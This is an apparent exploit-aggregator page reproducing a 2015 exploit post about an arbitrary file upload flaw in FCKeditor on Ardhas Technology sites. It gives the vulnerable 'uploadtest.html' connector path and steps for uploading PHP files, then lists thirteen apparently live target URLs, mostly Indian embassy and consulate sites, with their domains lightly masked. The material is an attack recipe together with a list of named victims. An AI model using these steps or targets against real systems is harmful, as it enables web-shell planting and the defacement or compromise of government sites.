Advertisement






Ardhas Technology (Fckeditor) Arbitrary File Upload Vulnerability

CVE Category Price Severity
CVE-2009-2265 CWE-434 $500 High
Author Risk Exploitation Type Date
ardhas High Remote 2015-12-17
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2015120191

Below is a copy:

Ardhas Technology (Fckeditor) Arbitrary File Upload Vulnerability /*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/

!*! Exploit Title : Ardhas Technology (Fckeditor) Arbitrary File Upload Vulnerability

!*! Exploit Author : Malw4r3

!*! Vendor Homepage : http://www.ardhas.com/

!*! Date: 12/17/2015

!*! Tested On : Linux , Windows

/*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/

!*! exploit => config/fckeditor/editor/filemanager/connectors/uploadtest.html

!*! select => Select the "File Uploader"> php ... upload to : Uploaded File URL:

!*! Demo(s) Site :

!*! http://roiramallaXh.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indeXmbassy.co.il//config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.hcXilondon.in/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.pminewyorXk.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indianembXassy.at//config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.hcisingaXpore.gov.in/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indembXassysuriname.com/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.cgimuXnich.com/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indiaXnembassy.am/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.cgieXdinburgh.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.inXdianembassy.se/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.cXgifrankfurt.de/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.iXndianembassythimphu.bt/config/fckeditor/editor/filemanager/connectors/uploadtest.html


/*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.